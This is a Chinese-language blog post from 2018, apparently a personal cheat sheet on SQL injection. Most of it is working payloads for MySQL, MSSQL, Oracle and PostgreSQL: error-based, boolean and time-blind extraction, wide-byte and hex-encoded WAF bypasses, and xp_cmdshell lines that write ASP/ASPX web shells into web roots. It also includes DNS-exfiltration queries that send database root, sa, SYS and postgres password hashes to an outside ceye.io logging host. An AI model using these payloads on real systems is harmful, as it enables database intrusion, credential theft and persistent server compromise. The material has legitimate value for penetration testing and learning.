<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="SQL," />










<meta name="description" content="12345用户输入数据被当成了代码被执行原则有回显则可以用union select有报错则用报错注入无回显则考虑dnslog, time-based, boolean-based 1. 注入点 select where12345select * from xxx where id = %s ;select * from xxx where id = &amp;apos;%s&amp;apos; ;select *">
<meta name="keywords" content="SQL">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="http://ultramangaia.github.io/blog/2018/SQL注入.html">
<meta property="og:site_name" content="UltramanGaia&#39;s Blog">
<meta property="og:description" content="12345用户输入数据被当成了代码被执行原则有回显则可以用union select有报错则用报错注入无回显则考虑dnslog, time-based, boolean-based 1. 注入点 select where12345select * from xxx where id = %s ;select * from xxx where id = &amp;apos;%s&amp;apos; ;select *">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-03-12T08:43:11.621Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入">
<meta name="twitter:description" content="12345用户输入数据被当成了代码被执行原则有回显则可以用union select有报错则用报错注入无回显则考虑dnslog, time-based, boolean-based 1. 注入点 select where12345select * from xxx where id = %s ;select * from xxx where id = &amp;apos;%s&amp;apos; ;select *">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://ultramangaia.github.io/blog/2018/SQL注入.html"/>





  <title>SQL注入 | UltramanGaia's Blog</title><!-- hexo-inject:begin --><!-- hexo-inject:end -->
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">UltramanGaia's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://ultramangaia.github.io/blog/2018/SQL注入.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="UltramanGaia">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="UltramanGaia's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-02-23T13:57:25+08:00">
                2018-02-23
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/信息安全/" itemprop="url" rel="index">
                    <span itemprop="name">信息安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">用户输入数据被当成了代码被执行</span><br><span class="line">原则</span><br><span class="line">有回显则可以用union select</span><br><span class="line">有报错则用报错注入</span><br><span class="line">无回显则考虑dnslog, time-based, boolean-based</span><br></pre></td></tr></table></figure>
<h2 id="1-注入点-select-where"><a href="#1-注入点-select-where" class="headerlink" title="1. 注入点 select where"></a>1. 注入点 select where</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">select * from xxx where id = %s ;</span><br><span class="line">select * from xxx where id = &apos;%s&apos; ;</span><br><span class="line">select * from xxx where id = &quot;%s&quot; ;</span><br><span class="line">select * from xxx where id = (&apos;%s&apos;) ;</span><br><span class="line">select * from xxx where id = (&quot;%s&quot;) ;</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">用</span><br><span class="line">&apos;</span><br><span class="line">&quot;</span><br><span class="line">(</span><br><span class="line">)</span><br><span class="line">char</span><br><span class="line">string</span><br><span class="line"></span><br><span class="line">组合看看能不能报错显示出执行的sql语句</span><br><span class="line"></span><br><span class="line">order by 查列数</span><br><span class="line">union select 看回显</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">适用于各种注入方式</span><br></pre></td></tr></table></figure>
<h2 id="2-注入点-update-insert-delete"><a href="#2-注入点-update-insert-delete" class="headerlink" title="2. 注入点 update / insert /delete"></a>2. 注入点 update / insert /delete</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">报错注入</span><br><span class="line">extractvalue()函数是MYSQL对XML文档数据进行查询函数。</span><br><span class="line">or extractvalue(1,concat(0x7e,version())) or</span><br><span class="line"></span><br><span class="line">updatexml()函数是MYSQL对XML文档数据进行修改的XPATH函数。</span><br><span class="line">or updatexml(1,concat(0x7e,(version())),0) or</span><br><span class="line"></span><br><span class="line">name_const()函数是MYSQL5.0.12版本加入的一个返回给定值的函数。当用来产生一个结果集合列时 , NAME_CONST() 促使该列使用给定名称。</span><br><span class="line">or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or</span><br><span class="line">在最新的MYSQL版本中，使用name_const()函数只能提取到数据库的版本信息。但是在一些比较旧的高于5.0.12(包括5.0.12)的MYSQL版本中，可以进一步提取更多数据。</span><br><span class="line"></span><br><span class="line">盲注</span><br><span class="line">update users set points =  1*(select conv(hex((select substr( pw ,1%s,1))),0b10000,0b10))</span><br></pre></td></tr></table></figure>
<h1 id="Mysql"><a href="#Mysql" class="headerlink" title="Mysql"></a>Mysql</h1><p>Mysql查询数据</p>
<p>大于Mysql 5.0<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">select schema_name from information_schema.schemata limit 0,1</span><br><span class="line">select table_name from information_schema.tables where table_schema=&apos;mysql&apos; limit 0,1</span><br><span class="line">select column_name from information_schema.columns where table_schema= &apos;mysql&apos; and table_name = &apos;db&apos; limit 0,1</span><br><span class="line">注：可以用十六进制代替数据库名、表名</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">如果过滤了空格，linux下可以用下列字符替代</span><br><span class="line">%09 tab水平</span><br><span class="line">%0a 换行</span><br><span class="line">%0d	return </span><br><span class="line">%0b tab垂直</span><br><span class="line">%a0 空格</span><br></pre></td></tr></table></figure>
<h2 id="双注入Double-Injection"><a href="#双注入Double-Injection" class="headerlink" title="双注入Double Injection"></a>双注入Double Injection</h2><p>原理：mysql在 group by时，会先建立一张虚拟表。<br>取第一条记录，执行 floor(rand(0)<em>2)，发现结果为0，查询虚拟表，发现0的键值不存在，则在虚拟表插入<br>的新的数据时 floor(rand(0)</em>2)会被再计算一次，结果为1（第二次计算）<br>取第二条记录，执行 floor(rand(0)<em>2)，发现结果为1（第三次计算），查询虚拟表，发现1的键值存在，所以<br>floor(rand(0)2)不会被计算第二次，直接count()加1，第二条记录查询完毕。<br>再次增加一条的时候<br>floor(rand(0)</em>2)发现结果为0（第4次计算）<br>查询虚拟表，发现0的键值不存在! 那么会在被计算一次<br>结果为1（第5次计算）<br>但是这个 已经存在了。主键值必须唯一。所以插入表就报错了。<br>返回的这个也是个表，每次查询处理计算完插入进去。<br>这样就可以报错了。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);</span><br><span class="line">and (select count(*) from (select 1 union select null union select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));</span><br><span class="line">union select 1,2 from (select+count(*),concat(floor(rand(0)*2),( 查询数据语句))a from information_schema.tables group by a)b</span><br></pre></td></tr></table></figure></p>
<h2 id="输出到文件中-需要知道绝对路径"><a href="#输出到文件中-需要知道绝对路径" class="headerlink" title="输出到文件中(需要知道绝对路径)"></a>输出到文件中(需要知道绝对路径)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">select * from users where id = ((&apos;1&apos;)) union select 1,2,users() into outfile &apos;D:\\1.txt&apos;;</span><br><span class="line">select * from users where id = ((&apos;1&apos;)) union select 1,2,users() into dumpfile &apos;D:\\1.txt&apos;;</span><br><span class="line">outfile 导出可以多行，会有换行等，适合导出文本文件</span><br><span class="line">dumpfile 导出只能是一行，没有换行，适合导出二进制文件</span><br></pre></td></tr></table></figure>
<h2 id="Boolean-注入"><a href="#Boolean-注入" class="headerlink" title="Boolean 注入"></a>Boolean 注入</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">爆数据长度</span><br><span class="line">and length(查询数据语句)=数字</span><br><span class="line">爆数据</span><br><span class="line">and mid((查询数据语句),数字,1)=&apos;字符&apos;</span><br></pre></td></tr></table></figure>
<h2 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">爆数据长度</span><br><span class="line">and if(length(查询数据语句)=数字,sleep(5),0)</span><br><span class="line">爆数据</span><br><span class="line">and if(mid((查询数据语句),数字,1)=&apos;字符&apos;,sleep(5),0)</span><br></pre></td></tr></table></figure>
<h2 id="二次排序注入-存储型的注入"><a href="#二次排序注入-存储型的注入" class="headerlink" title="二次排序注入 (存储型的注入)"></a>二次排序注入 (存储型的注入)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">二次排序注入也成为存储型的注入，就是将可能导致sql注入的字符先存入到数据库中，当再次调用这个恶意构造的字符时，就可以触发sql注入。</span><br><span class="line">二次排序注入思路：</span><br><span class="line">1. hacker输入的数据会经过转义代入sql语句中，然后，储存在数据库中，在数据库中的数据是没有转义的</span><br><span class="line">2. hacker进行别的操作，将数据库中的数据取出来（未转义）并用于拼接到另外一个sql语句中，这就可以绕过转义了。</span><br><span class="line">假设存在一个账户&quot;admin&quot;，密码不知</span><br><span class="line">创建一个账户&quot;admin&apos;#&quot;，则在数据库中保存有&quot;admin&apos;#&quot;</span><br><span class="line">修改密码的时候，代入sql语句</span><br><span class="line">update users set passwd = &quot;xxxx&quot; where username = &apos;      admin&apos;#    &apos; and passwd = &apos;xxxxxxx&apos;</span><br></pre></td></tr></table></figure>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">%df&apos;   -&gt;    %df%5c&apos;</span><br><span class="line">将sql语句解析为gbk编码时，</span><br><span class="line">%df%5c  -&gt;  当成一个字符，后面的&apos;逃逸出来了</span><br><span class="line"></span><br><span class="line">(1) mysql_query，如mysql_query(&quot;SET NAMES &apos;gbk&apos;&quot;, $conn)、mysql_query(&quot;setcharacter_set_client = gbk&quot;, $conn)。</span><br><span class="line"></span><br><span class="line">(2) mysql_set_charset，如mysql_set_charset(&quot;gbk&quot;,$conn)。</span><br><span class="line"></span><br><span class="line">(3) mb_convert_encoding，如mb_convert_encoding($sql,&quot;utf8&quot;,&quot;gbk&quot;)，将SQL语句从gbk格式转换为utf8格式时，0x5c被吃掉了。</span><br><span class="line"></span><br><span class="line">(4) iconv，如iconv(&apos;GBK&apos;, &apos;UTF-8&apos;,$sql)</span><br></pre></td></tr></table></figure>
<h2 id="dnslog注入"><a href="#dnslog注入" class="headerlink" title="dnslog注入"></a>dnslog注入</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT LOAD_FILE(CONCAT(&apos;\\\\&apos;,(SELECT password FROM mysql.user WHERE user=&apos;root&apos; LIMIT 1),&apos;.mysql.ip.port.b182oj.ceye.io\\abc&apos;));</span><br></pre></td></tr></table></figure>
<h1 id="mssql"><a href="#mssql" class="headerlink" title="mssql"></a>mssql</h1><h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">@@version&gt;0</span><br><span class="line">@@SERVERNAME</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">爆数据库名</span><br><span class="line">db_name()&gt;0</span><br><span class="line">(SELECT top 1 Name FROM Master..SysDatabases)&gt;0</span><br><span class="line">(SELECT top 1 Name FROM Master..SysDatabases where name not in (&apos;master&apos;))&gt;0</span><br><span class="line">爆表名</span><br><span class="line">(select top 1 name from 数据库名.sys.all_objects where type=&apos;U&apos; AND is_ms_shipped=0)&gt;0</span><br><span class="line">users</span><br><span class="line">(select top 1 name from 数据库名.sys.all_objects where type=&apos;U&apos; AND is_ms_shipped=0 and name not in (&apos;users&apos;))&gt;0</span><br><span class="line">爆列名</span><br><span class="line">(select top 1 COLUMN_NAME from 数据库名.information_schema.columns where TABLE_NAME=&apos;表名&apos;)&gt;0</span><br><span class="line">(select top 1 COLUMN_NAME from 数据库名.information_schema.columns where TABLE_NAME=&apos;表名&apos; and COLUMN_NAME not in (&apos;列名&apos;))&gt;0</span><br><span class="line">爆数据</span><br><span class="line">(select top 1 列名 from 表名)&gt;0</span><br><span class="line">gxctf</span><br><span class="line">(select top 1 列名 from 表名 and 列名 not in (&apos;gxctf&apos;))&gt;0</span><br></pre></td></tr></table></figure>
<h2 id="输出到文件，上传木马"><a href="#输出到文件，上传木马" class="headerlink" title="输出到文件，上传木马"></a>输出到文件，上传木马</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?id=1;exec master..xp_cmdshell &apos;echo &quot;&lt;%@ LANGUAGE=VBSCRIPT %&gt;;&lt;%eval request(chr(35))%&gt;&apos;&apos;&quot; &gt; d:\www\1.asp&apos;--</span><br><span class="line"></span><br><span class="line">?id=1;exec master..xp_cmdshell &apos;echo &quot;&lt;%@ LANGUAGE=Jscript %&gt;;&lt;%eval(Request(&quot;sb&quot;),&quot;unsafe&quot;)%&gt;&apos;&apos;&quot; &gt;C:\inetpub\wwwroot\2.aspx&apos; --</span><br></pre></td></tr></table></figure>
<h2 id="hex编码绕过waf"><a href="#hex编码绕过waf" class="headerlink" title="hex编码绕过waf"></a>hex编码绕过waf</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">1. 爆数据库版本：</span><br><span class="line">select convert(int,@@version) </span><br><span class="line">hex编码后：0x73656c65637420636f6e7665727428696e742c404076657273696f6e29</span><br><span class="line">?id=1; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--</span><br><span class="line">转换成数据类型 int 时失败。</span><br><span class="line">2. 爆当前数据库</span><br><span class="line">select convert(int,db_name()) </span><br><span class="line">hex 编码后：</span><br><span class="line">0x73656c65637420636f6e7665727428696e742c64625f6e616d65282929</span><br><span class="line">?id=1; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c64625f6e616d65282929 eXeC(@s)--</span><br><span class="line">3. 爆用户：</span><br><span class="line">select convert(int,User_Name())</span><br><span class="line">hex编码后：0x73656c65637420636f6e7665727428696e742c557365725f4e616d65282929</span><br><span class="line">?id=1; dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c557365725f4e616d65282929 eXeC(@s)--</span><br><span class="line">同理</span><br></pre></td></tr></table></figure>
<h2 id="boolean盲注"><a href="#boolean盲注" class="headerlink" title="boolean盲注"></a>boolean盲注</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?c=c1&apos;/**/and/**/ascii(substring(@@version,1,1))&gt;0/**/--&amp;t=0</span><br><span class="line">?c=c1&apos;/**/and/**/ascii(substring(子查询,1,1))&gt;0/**/--&amp;t=0</span><br></pre></td></tr></table></figure>
<h2 id="dnslog注入-1"><a href="#dnslog注入-1" class="headerlink" title="dnslog注入"></a>dnslog注入</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">DECLARE @host varchar(1024);</span><br><span class="line">SELECT @host=(SELECT TOP 1</span><br><span class="line">master.dbo.fn_varbintohexstr(password_hash)</span><br><span class="line">FROM sys.sql_logins WHERE name=&apos;sa&apos;)</span><br><span class="line">+&apos;.ip.port.b182oj.ceye.io&apos;;</span><br><span class="line">EXEC(&apos;master..xp_dirtree</span><br><span class="line">&quot;\\&apos;+@host+&apos;\foobar$&quot;&apos;);</span><br></pre></td></tr></table></figure>
<h1 id="Oracle"><a href="#Oracle" class="headerlink" title="Oracle"></a>Oracle</h1><h2 id="dnslog注入-2"><a href="#dnslog注入-2" class="headerlink" title="dnslog注入"></a>dnslog注入</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">SELECT UTL_INADDR.GET_HOST_ADDRESS(&apos;ip.port.b182oj.ceye.io&apos;);</span><br><span class="line">SELECT UTL_HTTP.REQUEST(&apos;http://ip.port.b182oj.ceye.io/oracle&apos;) FROM DUAL;</span><br><span class="line">SELECT HTTPURITYPE(&apos;http://ip.port.b182oj.ceye.io/oracle&apos;).GETCLOB() FROM DUAL;</span><br><span class="line">SELECT DBMS_LDAP.INIT((&apos;oracle.ip.port.b182oj.ceye.io&apos;,80) FROM DUAL;</span><br><span class="line">SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name=&apos;SYS&apos;)||&apos;.ip.port.b182oj.ceye.io&apos;,80) FROM DUAL;</span><br></pre></td></tr></table></figure>
<h1 id="Postgresql"><a href="#Postgresql" class="headerlink" title="Postgresql"></a>Postgresql</h1><h2 id="dnslog注入-3"><a href="#dnslog注入-3" class="headerlink" title="dnslog注入"></a>dnslog注入</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">DROP TABLE IF EXISTS table_output;</span><br><span class="line">CREATE TABLE table_output(content text);</span><br><span class="line">CREATE OR REPLACE FUNCTION temp_function()</span><br><span class="line">RETURNS VOID AS $</span><br><span class="line">DECLARE exec_cmd TEXT;</span><br><span class="line">DECLARE query_result TEXT;</span><br><span class="line">BEGIN</span><br><span class="line">SELECT INTO query_result (SELECT passwd</span><br><span class="line">FROM pg_shadow WHERE usename=&apos;postgres&apos;);</span><br><span class="line">exec_cmd := E&apos;COPY table_output(content)</span><br><span class="line">FROM E\&apos;\\\\\\\\&apos;||query_result||E&apos;.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\&apos;&apos;;</span><br><span class="line">EXECUTE exec_cmd;</span><br><span class="line">END;</span><br><span class="line">$ LANGUAGE plpgsql SECURITY DEFINER;</span><br><span class="line">SELECT temp_function();</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL/" rel="tag"># SQL</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog/2018/计算机网络基础.html" rel="next" title="计算机网络基础">
                <i class="fa fa-chevron-left"></i> 计算机网络基础
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/blog/2018/ssh反向连接和正向连接.html" rel="prev" title="ssh反向连接和正向连接">
                ssh反向连接和正向连接 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="UltramanGaia" />
            
              <p class="site-author-name" itemprop="name">UltramanGaia</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">33</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-注入点-select-where"><span class="nav-number">1.</span> <span class="nav-text">1. 注入点 select where</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-注入点-update-insert-delete"><span class="nav-number">2.</span> <span class="nav-text">2. 注入点 update / insert /delete</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Mysql"><span class="nav-number"></span> <span class="nav-text">Mysql</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#双注入Double-Injection"><span class="nav-number">1.</span> <span class="nav-text">双注入Double Injection</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#输出到文件中-需要知道绝对路径"><span class="nav-number">2.</span> <span class="nav-text">输出到文件中(需要知道绝对路径)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Boolean-注入"><span class="nav-number">3.</span> <span class="nav-text">Boolean 注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#时间盲注"><span class="nav-number">4.</span> <span class="nav-text">时间盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二次排序注入-存储型的注入"><span class="nav-number">5.</span> <span class="nav-text">二次排序注入 (存储型的注入)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#宽字节注入"><span class="nav-number">6.</span> <span class="nav-text">宽字节注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#dnslog注入"><span class="nav-number">7.</span> <span class="nav-text">dnslog注入</span></a></li></ol></li><li class="nav-item 